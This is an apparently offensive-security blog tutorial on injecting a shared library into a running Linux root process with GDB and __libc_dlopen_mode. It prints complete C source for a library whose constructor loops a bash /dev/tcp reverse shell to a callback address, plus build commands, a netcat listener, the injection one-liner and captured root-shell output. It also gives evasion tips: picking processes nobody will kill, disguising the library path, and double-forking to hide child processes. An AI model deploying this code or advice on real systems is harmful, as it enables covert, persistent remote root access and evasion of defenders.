 1415 root     /sbin/agetty --noclear tty1 linux
 1449 root     /lib/systemd/systemd --user
 1451 root      \_ (sd-pam)

Some good choices in there. Ideally we’ll use a long-running process which nobody’s going to want to kill. Processes with low pids tend to work nicely, as they’re started early and nobody wants to find out what happens when they die. It’s helpful to inject into something running as root to avoid having to worry about permissions. Even better is a process that nobody wants to kill but which isn’t doing anything useful anyway.

In some cases, something short-lived, killable, and running as a user is good if the injected code only needs to run for a short time (e.g. something to survey the box, grab creds, and leave) or if there’s a good chance it’ll need to be stopped the hard way. It’s a judgement call.

We’ll use 664 root /sbin/lvmetad -f. It should be able to do anything we’d like and if something goes wrong we can restart it, probably without too much fuss.


More or less any Linux shared object file can be injected. We’ll make a small one for demonstration purposes, but I’ve injected multi-megabyte backdoors written in Go as well. A lot of the fiddling that went into making this blog post was done using pcapknock.

For the sake of simplicity, we’ll use the following. Note that a lot of error handling has been elided for brevity. In practice, getting meaningful error output from injected libraries’ constructor functions isn’t as straightforward as a simple warn("something"); return; unless you really trust the standard error of your victim process.

#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>

#define SLEEP  120                    /* Time to sleep between callbacks */
#define CBADDR "<REDACTED>"           /* Callback address */
#define CBPORT "4444"                 /* Callback port */

/* Reverse shell command */
#define CMD "echo 'exec >&/dev/tcp/"\
            CBADDR "/" CBPORT "; exec 0>&1' | /bin/bash"

void *callback(void *a);

__attribute__((constructor)) /* Run this function on library load */
void start_callbacks(){
        pthread_t tid;
        pthread_attr_t attr;

        /* Start thread detached (pthread functions return 0 on success) */
        if (0 != pthread_attr_init(&attr)) {
                return;
        }
        if (0 != pthread_attr_setdetachstate(&attr,
                                PTHREAD_CREATE_DETACHED)) {
                return;
        }

        /* Spawn a thread to do the real work */
        pthread_create(&tid, &attr, callback, NULL);
}

/* callback tries to spawn a reverse shell every so often.  */
void *
callback(void *a)
{
        for (;;) {
                /* Try to spawn a reverse shell */
                system(CMD);
                /* Wait until next shell */
                sleep(SLEEP);
        }
        return NULL;
}

In a nutshell, this will spawn an unencrypted, unauthenticated reverse shell to a hardcoded address and port every couple of minutes. The __attribute__((constructor)) applied to start_callbacks() causes it to run when the library is loaded. All start_callbacks() does is spawn a thread to make reverse shells.

Building a library is similar to building any C program, except that -fPIC and -shared must be given to the compiler.

cc -O2 -fPIC -o libcallback.so ./callback.c -lpthread -shared

It’s not a bad idea to optimize the output with -O2 to maybe consume less CPU time. Of course, on a real engagement the injected library will be significantly more complex than this example.


Now that we have the injectable library created, we can do the deed. First thing to do is start a listener to catch the callbacks:

nc -nvl 4444 #OpenBSD netcat ftw!

__libc_dlopen_mode takes two arguments, the path to the library and flags as an integer. The path to the library will be visible, so it’s best to put it somewhere inconspicuous, like /usr/lib. We’ll use 2 for the flags, which corresponds to dlopen(3)’s RTLD_NOW. To get GDB to cause the process to run the function, we’ll use GDB’s print command, which conveniently gives us the function’s return value. Instead of typing the command into GDB, which takes eons in program time, we’ll echo it into GDB’s standard input. This has the nice side-effect of causing GDB to exit without needing a quit command.

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# echo 'print __libc_dlopen_mode("/root/libcallback.so", 2)' | gdb -p 664
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
0x00007f6ca1cf75d3 in select () at ../sysdeps/unix/syscall-template.S:84
84      ../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) [New Thread 0x7f6c9bfff700 (LWP 1590)]
$1 = 312536496
(gdb) quit
A debugging session is active.

        Inferior 1 [process 664] will be detached.

Quit anyway? (y or n) [answered Y; input not from terminal]
Detaching from program: /sbin/lvmetad, process 664

Checking netcat, we’ve caught the callback:

$ nc -nvl 4444
Connection from <REDACTED> 50184 received!
ps -fxo pid,user,args
  664 root     /sbin/lvmetad -f
 1591 root      \_ sh -c echo 'exec >&/dev/tcp/<REDACTED>/4444; exec 0>&1' | /bin/bash
 1593 root          \_ /bin/bash
 1620 root              \_ ps -fxo pid,user,args

That’s it, we’ve got execution in another process.

If the injection had failed, we’d have seen $1 = 0, indicating __libc_dlopen_mode returned NULL.
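The two magic numbers in this step, the flags value 2 and the printed $1, can be sanity-checked with a few lines of C. This is only a sketch: the helper names are invented for illustration, and the numeric values are the ones glibc on Linux uses, so check_flag_values() will abort on a platform where they differ.

```c
#include <assert.h>
#include <dlfcn.h>

/* Abort if this platform's dlopen(3) flag values differ from the ones assumed here */
void check_flag_values(void)
{
        assert(RTLD_LAZY == 1);
        assert(RTLD_NOW == 2);
}

/* Nonzero if the integer flags request immediate symbol binding (RTLD_NOW) */
int uses_rtld_now(int flags)
{
        return (flags & RTLD_NOW) != 0;
}

/* GDB prints the returned handle as an integer; 0 is NULL and means the load failed */
int load_succeeded(long printed_value)
{
        return printed_value != 0;
}
```

With these, uses_rtld_now(2) is true and load_succeeded(312536496) is true, matching the session above, while load_succeeded(0) is false.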


There are several places defenders might catch us. The risk of detection can be minimized to a certain extent, but without a rootkit, there’s always some way to see we’ve done something. Of course, the best way to hide is to not raise suspicions in the first place.

Process listing

A process listing like the one above will show that the process into which we’ve injected malware has funny child processes. This can be avoided by either having the library double-fork a child process to do the actual work or having the injected library do everything from within the victim process.
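The double-fork mentioned here is the standard Unix daemon idiom. A minimal sketch follows, assuming the real work is wrapped in a function. run_detached() and example_work() are hypothetical names, and the placeholder does nothing.

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run work() in a grandchild that is no longer a child of the caller.
 * Returns 0 once the intermediate child has been reaped, -1 on error. */
int run_detached(void (*work)(void))
{
        assert(work != NULL);

        pid_t child = fork();
        if (child < 0)
                return -1;

        if (child == 0) {
                /* Intermediate child: fork again, then exit right away */
                pid_t grandchild = fork();
                if (grandchild == 0) {
                        setsid();       /* start a new session */
                        work();
                        _exit(0);
                }
                _exit(grandchild < 0 ? 1 : 0);
        }

        /* Original process: reap the intermediate child so no zombie is left */
        int status;
        if (waitpid(child, &status, 0) < 0)
                return -1;
        return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

/* Hypothetical placeholder for the actual work */
void example_work(void)
{
}
```

Because the intermediate child exits immediately, the grandchild is reparented (typically to init), so it no longer shows up under the original process in a tree-style listing.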

Files on disk

The loaded library has to start on disk, which leaves disk artifacts, and the original path to the library is visible in /proc/pid/maps:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# cat /proc/664/maps                                                      
7f6ca0650000-7f6ca0651000 r-xp 00000000 fd:01 61077    /root/libcallback.so                        
7f6ca0651000-7f6ca0850000 ---p 00001000 fd:01 61077    /root/libcallback.so                        
7f6ca0850000-7f6ca0851000 r--p 00000000 fd:01 61077    /root/libcallback.so
7f6ca0851000-7f6ca0852000 rw-p 00001000 fd:01 61077    /root/libcallback.so            

If we delete the library, (deleted) is appended to the filename (i.e. /root/libcallback.so (deleted)), which looks even weirder. This is somewhat mitigated by putting the library somewhere libraries normally live, like /usr/lib, and naming it something normal-looking.
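From the defender’s side, these artifacts are easy to pick out programmatically. The following is a rough sketch of a parser for a single line of /proc/pid/maps that extracts the backing path and notes whether it carries the (deleted) suffix. The struct and function names are invented for this example, and the field layout is assumed to match the output shown above.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* One parsed line of /proc/<pid>/maps */
struct map_entry {
        unsigned long start, end;       /* address range */
        char perms[5];                  /* e.g. "r-xp" */
        char path[256];                 /* backing file, without any suffix */
        int deleted;                    /* 1 if the line ended in " (deleted)" */
};

/* Parse one maps line. Returns 1 for a file-backed mapping, 0 otherwise. */
int parse_maps_line(const char *line, struct map_entry *e)
{
        assert(line != NULL && e != NULL);
        memset(e, 0, sizeof *e);

        /* Fields: start-end perms offset dev inode path */
        int n = sscanf(line, "%lx-%lx %4s %*lx %*x:%*x %*lu %255[^\n]",
                       &e->start, &e->end, e->perms, e->path);
        if (n < 4 || e->path[0] != '/')
                return 0;       /* anonymous mapping or pseudo-path like [stack] */

        /* Strip and record the suffix appended for unlinked files */
        static const char suffix[] = " (deleted)";
        size_t plen = strlen(e->path), slen = sizeof suffix - 1;
        if (plen > slen && strcmp(e->path + plen - slen, suffix) == 0) {
                e->deleted = 1;
                e->path[plen - slen] = '\0';
        }
        return 1;
}
```

A checker could feed every line of a process’s maps file through this and flag executable mappings whose path is deleted or lives outside the usual library directories.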

Service disruption

Loading the library stops the running process for a short amount of time. If the library causes process instability, it may crash the process or at least cause it to log warning messages. On a related note, don’t inject into systemd(1): it causes segfaults and makes shutdown(8) hang the box.

Process injection on Linux is reasonably easy:

  1. Write a library (shared object file) with a constructor.
  2. Load it with echo 'print __libc_dlopen_mode("/path/to/library.so", 2)' | gdb -p <PID>